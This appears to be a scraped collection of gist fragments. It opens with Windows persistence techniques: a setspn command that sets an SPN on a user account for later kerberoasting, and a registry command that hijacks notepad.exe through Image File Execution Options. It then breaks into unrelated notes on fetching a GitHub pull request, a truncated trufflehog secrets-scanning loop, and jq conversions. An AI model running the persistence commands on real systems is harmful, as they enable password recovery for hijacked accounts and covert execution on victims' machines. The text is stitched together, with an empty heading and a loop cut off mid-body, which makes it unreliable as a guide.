Joshua Wright joswr1ght

Misc persistence techniques

Set User SPN for future kerberoast attacks

Set a SPN on a user account to provide to regain password to account that was changed.

Example

setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname

Image File Execution Options - DOS

Notepad bomb

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /t REG_SZ /v Debugger /d "cmd.exe /c echo Come at me bro... && start C:\windows\notepad.exe&" /f

Explorer Bomb

It's not immediately obvious how to pull down the code for a PR and test it locally. But it's pretty easy. (This assumes you have a remote for the main repo named upstream.)

Getting the PR code

Make note of the PR number. For example, Rod's latest is PR #37: Psiphon-Labs/psiphon-tunnel-core#37
Fetch the PR's pseudo-branch (or bookmark or rev pointer whatever the word is), and give it a local branch name. Here we'll name it pr37:

$ git fetch upstream pull/37/head:pr37

	# Secrets scanning at scale: 3 different tools

	# trufflehog
	#!/bin/bash
	# 1. get all repos: gh repo list <organization> --limit 1000 > repos.txt
	# 2. parse repos.txt so each line looks similar to: https://github.com/username/repo-name.git

	# Remotely scan the repos using trufflehog without downloading
	while IFS= read -r repo
	do

	# Convert to TSV
	# Note -r flag
	# to_entries creates an array of key,value maps, the trailing [] converts this array to stream items
	cat api-docs.json \| jq -r '.paths \| to_entries[] \| .key as $path \| .value \| to_entries[] \| [.key,$path,.value.tags[0]] \| @tsv'

	# Transform into different JSON...
	cat api-docs.json \| jq '[ .paths \| to_entries[] \| .key as $path \| .value \| to_entries[] \| { path:$path, method:.key, tag:.value.tags[0] } ]'